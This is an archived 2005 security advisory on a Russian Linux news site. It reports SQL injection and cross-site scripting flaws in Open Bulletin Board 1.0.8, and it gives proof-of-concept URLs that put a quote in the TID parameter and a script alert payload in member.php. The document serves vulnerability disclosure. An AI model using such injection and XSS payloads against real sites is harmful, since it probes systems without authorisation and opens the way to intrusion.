The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


OpenBB SQL Injection & Cross-site Scripting Vulnerability


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 13 May 2005 04:23:11 -0000
From: Megasky <magasky@hotmail.com.>
To: [email protected]
Subject: OpenBB SQL Injection & Cross-site Scripting Vulnerability
X-Virus-Scanned: antivirus-gw at tyumen.ru



Open Bulletin Board 
www.openbb.com

Vulnerable versions: 1.0.8

* OpenBB read.php SQL Injection Vulnerability                     


Proof of concept: 
http://www.example.com/openbb/read.php?action=lastpost&TID='
http://www.example.com/openbb/read.php?TID='


* OpenBB member.php Cross-Site Scripting Vulnerability


Proof of concept: 
http://www.example.com/member.php?action=list&page=2&sortorder=username&perpage=25&reverse="><script>alert('test');</script>


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру